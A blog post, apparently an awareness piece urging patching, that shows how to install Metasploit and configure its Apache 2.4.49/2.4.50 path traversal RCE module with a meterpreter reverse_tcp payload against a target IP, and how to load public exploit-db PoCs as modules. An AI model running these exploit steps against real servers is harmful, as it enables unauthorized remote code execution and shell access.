[Introduction] Metasploit Framework [For penetration testing]

Hello.
I am an infrastructure manager in the system solution department.
Click here for articles written in the past

There is a famous open source software called Metasploit Framework.
This is a tool used for "penetration testing," which evaluates the durability of security by actually exploiting vulnerabilities in middleware, etc.

This time, I would like to prepare an environment where the above tools can be used.

When you look at tools like this, you can get a sense of the dangers of continuing to use versions with vulnerabilities, so the purpose of this article is to make you aware of that.

*Although it is a penetration tool, please be sure to use it in a verification environment prepared by yourself.
Abuse is a crime, so please use at your own risk.

Metasploit Framework installation

As usual, the environment was prepared with a CentOS7 bento box

Let's install the tool according to the documentation

[root@localhost ~]# curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall [root@localhost ~]# chmod 755 msfinstall [root@localhost ~]# ./msfinstall

After installation, you can start it with the following command.
When I ran it, an interactive shell was displayed.

[root@localhost ~]# /opt/metasploit-framework/bin/msfconsole ・ ・ Omitted ・ msf6 >

It was easy.

try it

You can use the search command to see the vulnerabilities already included in the tool.
First, let's look for vulnerabilities in Apache.

msf6 > search httpd Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- - --- ----- ----------- 0 exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution 1 exploit/multi/http/ apache_normalize_path_rce 2021-05-10 excellent Yes Apache 2.4.49/2.4.50 Traversal RCE 2 auxiliary/scanner/http/apache_normalize_path 2021-05-10 normal No Apache 2.4.49/2.4.50 Traversal RCE scanner 3 auxiliary/scanner/http /mod_negotiation_brute normal No Apache HTTPD mod_negotiation Filename Bruter 4 auxiliary/scanner/http/mod_negotiation_scanner normal No Apache HTTPD mod_negotiation Scanner 5 exploit/windows/http/apache_chunked 2002-06-19 good Yes Apache Win32 Chunked Encoding 6 exploit/linux/http/dlink_dspw110_cookie_noau th_exec 2015-06-12 normal Yes D-Link Cookie Command Execution ・ ・ ・

Over 20 lists came out.
Let's use "exploit/multi/http/apache_normalize_path_rce" as the subject, which is located at the top.
This vulnerability allows remote command execution if files outside the document root are not protected by "require all denied" and CGI is explicitly enabled.

Select the vulnerability with the use command.

msf6 > use exploit/multi/http/apache_normalize_path_rce # If the display looks like this, OK msf6 exploit(multi/http/apache_normalize_path_rce) >

The options you need to enter differ depending on the vulnerability, so check them using the show options command.
Let's see it in action.

msf6 exploit(multi/http/apache_normalize_path_rce) > show options Module options (exploit/multi/http/apache_normalize_path_rce): Name Current Setting Required Description ---- --------------- -- ------ ----------- CVE CVE-2021-42013 yes The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013) DEPTH 5 yes Depth for Path Traversal Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit /basics/using-met asploit.html RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /cgi-bin yes Base path VHOST no HTTP server virtual host Payload options (linux/x64/meterpreter /reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (Dropper)

Option input is required for items whose Required field is set to yes.
Among them, "RHOSTS (target IP)" and "LHOST (attacker IP)" are required and left blank. (Others have default values.)
These items must be filled in manually.

# IP is appropriate. msf6 exploit(multi/http/apache_normalize_path_rce) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.1.2 LHOST => 192.168.1.2

All that's left to do is run it.

msf6 exploit(multi/http/apache_normalize_path_rce) > exploit

Fetch vulnerable code from outside and execute it

The attack code for the vulnerability has been made public for demonstration purposes. (This is called PoC)
Therefore, by using it, it is possible to test it immediately.

This time, I will pull from the following site provided by Offensive Security, which is famous for Kali-Linux.
https://www.exploit-db.com/
You can obtain the PoC code by clicking the download button on the target page.

Copy the code downloaded locally from here to the Metasploit modules/exploit directory.

In my environment, the path was as follows:
/opt/metasploit-framework/embedded/framework/modules/exploits
Once placed, it needs to be reloaded.

[root@localhost exploits]# /opt/metasploit-framework/bin/msfconsole msf6 > reload_all

Since Metasploit itself is written in Ruby, I thought the module would have to be in Ruby, but it seems that Python or Golang would be fine as well.

summary

Yes, do you understand how dangerous it is?

Just like with patents, the contents must be made public in order for the public to acknowledge their existence, and malicious people can easily test for vulnerabilities.

Therefore, it is dangerous to continue using older versions of tools.
It goes without saying, but be sure to update regularly.

(It was an awareness campaign. End.)